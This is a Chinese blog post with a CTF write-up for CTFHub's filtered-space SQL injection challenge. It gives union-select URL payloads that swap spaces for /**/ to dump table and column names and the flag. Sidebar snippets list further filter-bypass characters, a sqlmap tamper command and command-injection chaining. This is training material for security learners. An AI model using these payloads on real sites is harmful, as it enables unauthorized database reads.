CTFHub技能树web(持续更新)--SQL注入--过滤空格

最新推荐文章于 2024-04-02 20:24:30 发布
最新推荐文章于 2024-04-02 20:24:30 发布
阅读量636 收藏 3
点赞数 1
分类专栏: CTFHub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jiuyongpinyin/article/details/108420156
版权

过滤空格

这道题依然可以使用手工和sqlmap的方式,这里先大概说一下手工,题目提示了过滤空格,那么我们就想办法绕过这里过滤,可以用“//”来代替空格:
在这里插入图片描述
这里使用联合查询语句爆破除了当前的数据库,接下来就是使用前文中提到过的手工注入,空格使用//来代替,爆破当前数据的表名:
在这里插入图片描述

?id=111/**/union/**/select/**/1,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='sqli'

接着爆破那个有点奇怪的表里面的列:
在这里插入图片描述

?id=111/**/union/**/select/**/1,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='hlrkwiuoqx'

爆破列里面的字段:
在这里插入图片描述

/?id=111/**/union/**/select/**/1,yuqgzisdfb/**/from/**/hlrkwiuoqx

得到了flag,这里要注意的是,注入期间没有使用到注释符,使用时会提示hacker,不过一般情况下,还是使用注释符的情况更多一些。
当然了,这道题也是可以直接使用sqlmap来结题的。使用方法参考之前的文章,这里就不再赘述了。

注:萌新第一次写write up,不足之处还请见谅,不对之处欢迎批评指正。

拼音怪兽
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlmap绕过空格过滤方法
qq_45290991的博客
07-17 4739
sqlmap自带的脚本: --tamper "space2comment.py" 补充: 脚本名:space2comment.py 作用:Replaces space character ' ' with comments /**/ 也就是用注释/**/替换空格字符' ' sqlmap中的tamper脚本有很多,例如:equaltolike.py(作用是用like代替等号)、apostrophemask.py(作用是用utf8代替引号)、greatest.p...
题解记录-CTFHub技能树|Web|SQL注入
weixin_57448435的博客
09-14 2065
数据库注入
过滤空格ctfhub
最新发布
2401_82985722的博客
04-02 310
注释过滤 /**/、/*!*/、//、#、--括号过滤 ()符号过滤 %00、%09、%20、%a0 %0a、%0b、%0c、%0d引号过滤 ' 、 "大小写过滤 大小写双关键字绕过 '+'正则表达式绕过 \s、\s*\s+ 表示匹配一个或多个空白字符,\s* 表示匹配零个或多个空白字符。
CTFHub | 过滤空格
尼泊罗河伯的博客
12-04 2349
根据网页显示内容提示,这题关于过滤空格注入,此题和其他的注入手法一致,只不过需要在网页 URL 中对 payload 语句中的空格符号进行过滤,判断发现此题存在过滤空格注入,接着判断字段数量,查看数据库位置和版本。使用注入常用流程爆库、爆表、爆数据。最后获得此题 flag 。
CTFHub技能树笔记之RCE:命令注入、过滤cat、过滤空格
weixin_48799157的博客
03-28 8237
小白一个,记录解题过程,如有错误请指正! 一、命令注入 补充知识点: 命令行注入漏洞是指web应用程序中调用了系统可执行命令的函数,而且输入参数是可控的,如果黑客拼接了注入命令,就可以进行非法操作了。 Windows系统支持的管道符如下: 1. “|”:直接执行后面的语句。 2. “||”:如果前面的语句执行失败,则执行后面的语句,前面的语句只能为假才行。 3. “&”:两条命令都执行,如果前面的语句为假则直接执行后面的语句,前面的语句可真可假。 4. “&&...
Secure-Systems-of-SQL-Injection-Attack:具有SQL注入漏洞的安全系统
05-01
恶意文本检测器,约束验证,查询长度验证和基于文本的密钥生成器是用于检测和防止SQL注入攻击访问数据库的四种过滤技术。 要求 Web应用程序 一台虚拟服务器 测试客户 封包捕获软件 执行 我们正在Ubuntu中进行此项目...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
超级SQL注入工具-web-sql
10-28
超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入 支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle...
vue+element-ui+websql
04-19
使用vue+elemetnui框架,采用websql/localsotrage作为数据存储,实现增删改查
CTFhub】命令注入—过滤空格
manerzi的博客
10-25 615
CTFhub】命令注入—过滤空格
CTFHub_技能树_WebSQL注入——过滤空格
Ho1aAs‘s Blog
12-23 943
文章目录一、过滤空格的绕过二、注入过程Ⅰ、爆表名Ⅱ、爆列名Ⅲ、爆flag 一、过滤空格的绕过 一般注入语句为 ?id=0 union select database(),user() 由于过滤空格致使无法执行注入的语句时,可使用以下字符代替空格,发挥同样效果 ():一对圆括号 +:加号 %09:TAB换行符的URL编码形式 /**/:块注释符 二、注入过程 依次尝试发现只能使用块注释符替换,那么开始注入: Ⅰ、爆表名 ?id=10/**/union/**/select/**/1,group_conc
CTFHUB-SQL注入-过滤空格
u014794539的博客
07-10 865
考点 正常的注入 过滤空格 需要绕过 过程分析 首先正常注入会提醒HACKER 经过尝试发现可以使用/**/代替空格绕过 获取数据库信息 0/**/union/**/select/**/1,database()/**/ 获取表信息 0/**/union/**/select/**/1,group_concat(table_name)/**/ from/**/information_schema.tables/**/where/**/table_schema='sqli' 得到表名whjmqubsk
CTFHUB-WEB-SQL注入-过滤空格
weixin_43486981的博客
08-11 866
一般的过滤空格可以使用注释符绕过,也就是用/**/替代空格 使用的工具:火狐浏览器渗透便携版 题目: 靶机环境:输入1会回显信息,输入错误的信息什么也不显示。 当使用带有空格的注入语句时,会提示hacker 根据提示提示,将空格使用/**/代替进行注入 查看显示位 求数据库名 求表名 求列名 求字段值,得到flag ...
CTFHub题解-技能树-WebSQL注入-过滤空格
weixin_51706044的博客
06-06 692
文章目录前言过滤空格SQLmap 前言 在本文中将会采用两种注入手法:SQLmap和手注,当然记录这篇文章主要是对SQLmap的使用进行一下学习 过滤空格 既然是过滤空格,绕过空格的方法: 1、/**/ 2、() 3、%0a SQLmap 对于SQLmap的使用可以参考该笔者的文章 一、爆数据库 python sqlmap.py -u "http://challenge-ba6a5630047ce20b.sandbox.ctfhub.com:10800/?id=1" --dbs --tamper
CTFHUB-过滤空格
Web学习之路
03-28 257
替换
CTFHub技能书解题笔记-RCE-过滤空格过滤目录分隔符、过滤运算符
qq_43006864的博客
04-01 3648
一、过滤空格 过滤空格。 引入绕过空格过滤的字符:< 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等 直接开始解题 这里就用<来绕过。flag还是再界面源码。 二、过滤目录分隔符 题目提示,这次过滤了目录分割符 / ,你能读到 flag 目录下的 flag 文件吗。 这里的话就更简单了,我们可以使用;和cd到目录然后使用cat抓取。也就是用;进行命令拼接。例如:x.x.x.x;cd ../;ls;cat xxx
ctfhub——web——sql注入(sqlmap实现)
weixin_43906500的博客
05-13 1669
本次sql注入全部基于sqlmap实现 1.整数型注入 题目如下,为整数型注入 1.1安装sqlmap sudo apt install sqlmap 1.2测试注入 sqlmap -u http://challenge-3c2c0ebf73b7a689.sandbox.ctfhub.com:10080/?id=1 成功注入 1.3查看数据库 执行命令 sqlmap -u http://challenge-3c2c0ebf73b7a689.sandbox.ctfhub.
java防sql注入过滤器_2019-08-23/防sql注入过滤
05-24
为了防止 SQL 注入攻击,通常可以使用过滤器进行过滤。以下是一个简单的 Java 过滤器示例,可以用于防止 SQL 注入攻击: 1. 创建一个名为 SqlFilter 的类,实现 javax.servlet.Filter 接口。 2. 在 doFilter 方法中,获取 HttpServletRequest 对象和 HttpServletResponse 对象。 3. 在获取参数时,对参数进行过滤,例如使用 StringEscapeUtils.escapeSql 方法对参数进行转义。 4. 最后,调用 filterChain.doFilter 方法将请求传递给下一个过滤器或 servlet。 以下是示例代码: ``` import javax.servlet.*; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import java.io.IOException; public class SqlFilter implements Filter { @Override public void init(FilterConfig filterConfig) throws ServletException { // 初始化方法 } @Override public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException { HttpServletRequest httpRequest = (HttpServletRequest) request; HttpServletResponse httpResponse = (HttpServletResponse) response; // 获取参数,对参数进行过滤 String username = StringEscapeUtils.escapeSql(httpRequest.getParameter("username")); String password = StringEscapeUtils.escapeSql(httpRequest.getParameter("password")); // 调用 filterChain.doFilter 方法将请求传递给下一个过滤器或 servlet chain.doFilter(request, response); } @Override public void destroy() { // 销毁方法 } } ``` 以上代码使用了 Apache Commons Lang 库中的 StringEscapeUtils 类,该类提供了对 SQL、HTML、XML 和 Java 代码等进行转义的方法。在实际使用时,需要将该库添加到项目中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值